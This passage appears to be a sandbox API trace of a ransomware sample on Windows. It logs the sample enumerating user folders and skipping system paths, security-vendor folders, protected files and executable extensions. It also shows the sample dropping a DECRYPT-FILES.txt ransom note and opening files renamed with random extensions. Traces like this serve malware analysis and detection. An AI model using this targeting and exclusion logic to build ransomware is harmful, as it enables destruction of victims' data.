(lpString1="Microsoft Store.url.DGto", lpString2="ntuser.dat.log") returned -1 [0186.624] lstrcmpiW (lpString1="Microsoft Store.url.DGto", lpString2="thumbs.db") returned -1 [0186.625] lstrcmpiW (lpString1="Microsoft Store.url.DGto", lpString2="Bootfont.bin") returned 1 [0186.625] lstrlenW (lpString="Microsoft Store.url.DGto") returned 24 [0186.625] lstrcmpiW (lpString1="DGto", lpString2="lnk") returned -1 [0186.625] lstrcmpiW (lpString1="DGto", lpString2="exe") returned -1 [0186.625] lstrcmpiW (lpString1="DGto", lpString2="sys") returned -1 [0186.625] lstrcmpiW (lpString1="DGto", lpString2="dll") returned -1 [0186.625] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned 46 [0186.625] lstrlenW (lpString="Microsoft Store.url.DGto") returned 24 [0186.625] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\" [0186.625] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\", lpString2="Microsoft Store.url.DGto" | out: lpString1="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.DGto") returned="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.DGto" [0186.625] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.625] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\Microsoft Websites\\Microsoft Store.url.DGto" (normalized: "c:\\users\\default\\favorites\\microsoft websites\\microsoft store.url.dgto"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.625] CloseHandle (hObject=0x0) returned 0 [0186.625] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.625] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e1f920, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18e, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Store.url.DGto", cAlternateFileName="MICROS~3.DGT")) returned 0 [0186.625] FindClose (in: hFindFile=0x4798b8 | out: hFindFile=0x4798b8) returned 1 [0186.626] CloseHandle (hObject=0xffffffff) returned 0 [0186.626] FindNextFileW (in: hFindFile=0x479878, lpFindFileData=0x36ff508 | out: lpFindFileData=0x36ff508*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0e6bbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e6bbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MSN Websites", cAlternateFileName="MSNWEB~1")) returned 1 [0186.626] lstrcmpW (lpString1="MSN Websites", lpString2=".") returned 1 [0186.626] lstrcmpW (lpString1="MSN Websites", lpString2="..") returned 1 [0186.626] lstrcatW (in: lpString1="MSN Websites", lpString2="\\" | out: lpString1="MSN Websites\\") returned="MSN Websites\\" [0186.626] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\", lpString2="MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\Program Files") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch=":\\Windows") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\Games\\") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\All Users") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.626] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.627] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="AhnLab") returned 0x0 [0186.627] StrStrW (lpFirst="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.627] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0186.627] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.627] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\\\0a16c9.tmp") returned 51 [0186.627] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\favorites\\msn websites\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.633] GetLastError () returned 0x5 [0186.633] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0186.633] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.633] wsprintfW (in: param_1=0x36fea6c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\Favorites\\MSN Websites\\\\DECRYPT-FILES.txt") returned 58 [0186.633] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\favorites\\msn websites\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.635] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0186.635] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\*") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\*" [0186.635] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\*", lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0e6bbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e6bbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4798b8 [0186.635] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.636] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0e6bbe0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e6bbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.636] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.636] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.636] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0e45a80, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0e45a80, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0e45a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.636] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.636] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e45a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Autos.url.ETaqt", cAlternateFileName="MSNAUT~1.ETA")) returned 1 [0186.636] lstrcmpiW (lpString1="MSN Autos.url.ETaqt", lpString2="DECRYPT-FILES.txt") returned 1 [0186.636] lstrcmpiW (lpString1="MSN Autos.url.ETaqt", lpString2="autorun.inf") returned 1 [0186.636] lstrcmpiW (lpString1="MSN Autos.url.ETaqt", lpString2="boot.ini") returned 1 [0186.636] lstrcmpiW (lpString1="MSN Autos.url.ETaqt", lpString2="desktop.ini") returned 1 [0186.636] lstrcmpiW (lpString1="MSN Autos.url.ETaqt", lpString2="ntuser.dat") returned -1 [0186.636] lstrcmpiW (lpString1="MSN Autos.url.ETaqt", lpString2="iconcache.db") returned 1 [0186.636] lstrcmpiW (lpString1="MSN Autos.url.ETaqt", lpString2="bootsect.bak") returned 1 [0186.636] lstrcmpiW (lpString1="MSN Autos.url.ETaqt", lpString2="ntuser.dat.log") returned -1 [0186.636] lstrcmpiW (lpString1="MSN Autos.url.ETaqt", lpString2="thumbs.db") returned -1 [0186.636] lstrcmpiW (lpString1="MSN Autos.url.ETaqt", lpString2="Bootfont.bin") returned 1 [0186.636] lstrlenW (lpString="MSN Autos.url.ETaqt") returned 19 [0186.636] lstrcmpiW (lpString1="ETaqt", lpString2="lnk") returned -1 [0186.636] lstrcmpiW (lpString1="ETaqt", lpString2="exe") returned -1 [0186.636] lstrcmpiW (lpString1="ETaqt", lpString2="sys") returned -1 [0186.636] lstrcmpiW (lpString1="ETaqt", lpString2="dll") returned 1 [0186.636] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0186.636] lstrlenW (lpString="MSN Autos.url.ETaqt") returned 19 [0186.636] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0186.636] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN Autos.url.ETaqt" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.ETaqt") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.ETaqt" [0186.636] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.636] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Autos.url.ETaqt" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn autos.url.etaqt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.637] CloseHandle (hObject=0x0) returned 0 [0186.637] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.637] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e45a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Entertainment.url.ETaqt", cAlternateFileName="MSNENT~1.ETA")) returned 1 [0186.637] lstrcmpiW (lpString1="MSN Entertainment.url.ETaqt", lpString2="DECRYPT-FILES.txt") returned 1 [0186.637] lstrcmpiW (lpString1="MSN Entertainment.url.ETaqt", lpString2="autorun.inf") returned 1 [0186.637] lstrcmpiW (lpString1="MSN Entertainment.url.ETaqt", lpString2="boot.ini") returned 1 [0186.637] lstrcmpiW (lpString1="MSN Entertainment.url.ETaqt", lpString2="desktop.ini") returned 1 [0186.637] lstrcmpiW (lpString1="MSN Entertainment.url.ETaqt", lpString2="ntuser.dat") returned -1 [0186.637] lstrcmpiW (lpString1="MSN Entertainment.url.ETaqt", lpString2="iconcache.db") returned 1 [0186.637] lstrcmpiW (lpString1="MSN Entertainment.url.ETaqt", lpString2="bootsect.bak") returned 1 [0186.637] lstrcmpiW (lpString1="MSN Entertainment.url.ETaqt", lpString2="ntuser.dat.log") returned -1 [0186.637] lstrcmpiW (lpString1="MSN Entertainment.url.ETaqt", lpString2="thumbs.db") returned -1 [0186.637] lstrcmpiW (lpString1="MSN Entertainment.url.ETaqt", lpString2="Bootfont.bin") returned 1 [0186.637] lstrlenW (lpString="MSN Entertainment.url.ETaqt") returned 27 [0186.637] lstrcmpiW (lpString1="ETaqt", lpString2="lnk") returned -1 [0186.637] lstrcmpiW (lpString1="ETaqt", lpString2="exe") returned -1 [0186.637] lstrcmpiW (lpString1="ETaqt", lpString2="sys") returned -1 [0186.637] lstrcmpiW (lpString1="ETaqt", lpString2="dll") returned 1 [0186.637] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0186.637] lstrlenW (lpString="MSN Entertainment.url.ETaqt") returned 27 [0186.637] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0186.637] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN Entertainment.url.ETaqt" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.ETaqt") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.ETaqt" [0186.637] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.638] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Entertainment.url.ETaqt" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn entertainment.url.etaqt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.638] CloseHandle (hObject=0x0) returned 0 [0186.638] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.638] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e45a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Money.url.ETaqt", cAlternateFileName="MSNMON~1.ETA")) returned 1 [0186.638] lstrcmpiW (lpString1="MSN Money.url.ETaqt", lpString2="DECRYPT-FILES.txt") returned 1 [0186.638] lstrcmpiW (lpString1="MSN Money.url.ETaqt", lpString2="autorun.inf") returned 1 [0186.638] lstrcmpiW (lpString1="MSN Money.url.ETaqt", lpString2="boot.ini") returned 1 [0186.638] lstrcmpiW (lpString1="MSN Money.url.ETaqt", lpString2="desktop.ini") returned 1 [0186.638] lstrcmpiW (lpString1="MSN Money.url.ETaqt", lpString2="ntuser.dat") returned -1 [0186.638] lstrcmpiW (lpString1="MSN Money.url.ETaqt", lpString2="iconcache.db") returned 1 [0186.638] lstrcmpiW (lpString1="MSN Money.url.ETaqt", lpString2="bootsect.bak") returned 1 [0186.638] lstrcmpiW (lpString1="MSN Money.url.ETaqt", lpString2="ntuser.dat.log") returned -1 [0186.638] lstrcmpiW (lpString1="MSN Money.url.ETaqt", lpString2="thumbs.db") returned -1 [0186.638] lstrcmpiW (lpString1="MSN Money.url.ETaqt", lpString2="Bootfont.bin") returned 1 [0186.638] lstrlenW (lpString="MSN Money.url.ETaqt") returned 19 [0186.638] lstrcmpiW (lpString1="ETaqt", lpString2="lnk") returned -1 [0186.638] lstrcmpiW (lpString1="ETaqt", lpString2="exe") returned -1 [0186.638] lstrcmpiW (lpString1="ETaqt", lpString2="sys") returned -1 [0186.638] lstrcmpiW (lpString1="ETaqt", lpString2="dll") returned 1 [0186.638] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0186.638] lstrlenW (lpString="MSN Money.url.ETaqt") returned 19 [0186.638] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0186.638] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN Money.url.ETaqt" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.ETaqt") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.ETaqt" [0186.638] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.639] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Money.url.ETaqt" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn money.url.etaqt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.639] CloseHandle (hObject=0x0) returned 0 [0186.639] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.639] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e45a80, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN Sports.url.ETaqt", cAlternateFileName="MSNSPO~1.ETA")) returned 1 [0186.639] lstrcmpiW (lpString1="MSN Sports.url.ETaqt", lpString2="DECRYPT-FILES.txt") returned 1 [0186.639] lstrcmpiW (lpString1="MSN Sports.url.ETaqt", lpString2="autorun.inf") returned 1 [0186.639] lstrcmpiW (lpString1="MSN Sports.url.ETaqt", lpString2="boot.ini") returned 1 [0186.639] lstrcmpiW (lpString1="MSN Sports.url.ETaqt", lpString2="desktop.ini") returned 1 [0186.639] lstrcmpiW (lpString1="MSN Sports.url.ETaqt", lpString2="ntuser.dat") returned -1 [0186.639] lstrcmpiW (lpString1="MSN Sports.url.ETaqt", lpString2="iconcache.db") returned 1 [0186.639] lstrcmpiW (lpString1="MSN Sports.url.ETaqt", lpString2="bootsect.bak") returned 1 [0186.639] lstrcmpiW (lpString1="MSN Sports.url.ETaqt", lpString2="ntuser.dat.log") returned -1 [0186.639] lstrcmpiW (lpString1="MSN Sports.url.ETaqt", lpString2="thumbs.db") returned -1 [0186.639] lstrcmpiW (lpString1="MSN Sports.url.ETaqt", lpString2="Bootfont.bin") returned 1 [0186.639] lstrlenW (lpString="MSN Sports.url.ETaqt") returned 20 [0186.639] lstrcmpiW (lpString1="ETaqt", lpString2="lnk") returned -1 [0186.639] lstrcmpiW (lpString1="ETaqt", lpString2="exe") returned -1 [0186.639] lstrcmpiW (lpString1="ETaqt", lpString2="sys") returned -1 [0186.639] lstrcmpiW (lpString1="ETaqt", lpString2="dll") returned 1 [0186.639] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0186.639] lstrlenW (lpString="MSN Sports.url.ETaqt") returned 20 [0186.639] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0186.639] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN Sports.url.ETaqt" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.ETaqt") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.ETaqt" [0186.639] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.640] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN Sports.url.ETaqt" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn sports.url.etaqt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.640] CloseHandle (hObject=0x0) returned 0 [0186.640] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.640] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e6bbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSN.url.p82hb", cAlternateFileName="MSNURL~1.P82")) returned 1 [0186.640] lstrcmpiW (lpString1="MSN.url.p82hb", lpString2="DECRYPT-FILES.txt") returned 1 [0186.640] lstrcmpiW (lpString1="MSN.url.p82hb", lpString2="autorun.inf") returned 1 [0186.640] lstrcmpiW (lpString1="MSN.url.p82hb", lpString2="boot.ini") returned 1 [0186.640] lstrcmpiW (lpString1="MSN.url.p82hb", lpString2="desktop.ini") returned 1 [0186.640] lstrcmpiW (lpString1="MSN.url.p82hb", lpString2="ntuser.dat") returned -1 [0186.640] lstrcmpiW (lpString1="MSN.url.p82hb", lpString2="iconcache.db") returned 1 [0186.640] lstrcmpiW (lpString1="MSN.url.p82hb", lpString2="bootsect.bak") returned 1 [0186.640] lstrcmpiW (lpString1="MSN.url.p82hb", lpString2="ntuser.dat.log") returned -1 [0186.640] lstrcmpiW (lpString1="MSN.url.p82hb", lpString2="thumbs.db") returned -1 [0186.640] lstrcmpiW (lpString1="MSN.url.p82hb", lpString2="Bootfont.bin") returned 1 [0186.640] lstrlenW (lpString="MSN.url.p82hb") returned 13 [0186.640] lstrcmpiW (lpString1="p82hb", lpString2="lnk") returned 1 [0186.640] lstrcmpiW (lpString1="p82hb", lpString2="exe") returned 1 [0186.640] lstrcmpiW (lpString1="p82hb", lpString2="sys") returned -1 [0186.640] lstrcmpiW (lpString1="p82hb", lpString2="dll") returned 1 [0186.640] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0186.640] lstrlenW (lpString="MSN.url.p82hb") returned 13 [0186.640] lstrcpyW (in: lpString1=0x36fea5c, lpString2="C:\\Users\\Default\\Favorites\\MSN Websites\\" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\" [0186.640] lstrcatW (in: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\", lpString2="MSN.url.p82hb" | out: lpString1="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.p82hb") returned="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.p82hb" [0186.640] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.641] CreateFileW (lpFileName="C:\\Users\\Default\\Favorites\\MSN Websites\\MSN.url.p82hb" (normalized: "c:\\users\\default\\favorites\\msn websites\\msn.url.p82hb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.641] CloseHandle (hObject=0x0) returned 0 [0186.641] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.641] FindNextFileW (in: hFindFile=0x4798b8, lpFindFileData=0x36ff28c | out: lpFindFileData=0x36ff28c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6346760, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6346760, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0e6bbe0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x18d, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSNBC News.url.p82hb", cAlternateFileName="MSNBCN~1.P82")) returned 1 [0186.641] lstrcmpiW (lpString1="MSNBC News.url.p82hb", lpString2="DECRYPT-FILES.txt") returned 1 [0186.641] lstrcmpiW (lpString1="MSNBC News.url.p82hb", lpString2="autorun.inf") returned 1 [0186.641] lstrcmpiW (lpString1="MSNBC News.url.p82hb", lpString2="boot.ini") returned 1 [0186.641] lstrcmpiW (lpString1="MSNBC News.url.p82hb", lpString2="desktop.ini") returned 1 [0186.641] lstrcmpiW (lpString1="MSNBC News.url.p82hb", lpString2="ntuser.dat") returned -1 [0186.641] lstrcmpiW (lpString1="MSNBC News.url.p82hb", lpString2="iconcache.db") returned 1 [0186.641] lstrcmpiW (lpString1="MSNBC News.url.p82hb", lpString2="bootsect.bak") returned 1 [0186.641] lstrcmpiW (lpString1="MSNBC News.url.p82hb", lpString2="ntuser.dat.log") returned -1 [0186.641] lstrcmpiW (lpString1="MSNBC News.url.p82hb", lpString2="thumbs.db") returned -1 [0186.641] lstrcmpiW (lpString1="MSNBC News.url.p82hb", lpString2="Bootfont.bin") returned 1 [0186.641] lstrlenW (lpString="MSNBC News.url.p82hb") returned 20 [0186.641] lstrcmpiW (lpString1="p82hb", lpString2="lnk") returned 1 [0186.641] lstrcmpiW (lpString1="p82hb", lpString2="exe") returned 1 [0186.641] lstrcmpiW (lpString1="p82hb", lpString2="sys") returned -1 [0186.641] lstrcmpiW (lpString1="p82hb", lpString2="dll") returned 1 [0186.641] lstrlenW (lpString="C:\\Users\\Default\\Favorites\\MSN Websites\\") returned 40 [0186.641] lstrlenW (lpString="MSNBC News.url.p82hb") returned 20 [0186.642] lstrcpyW 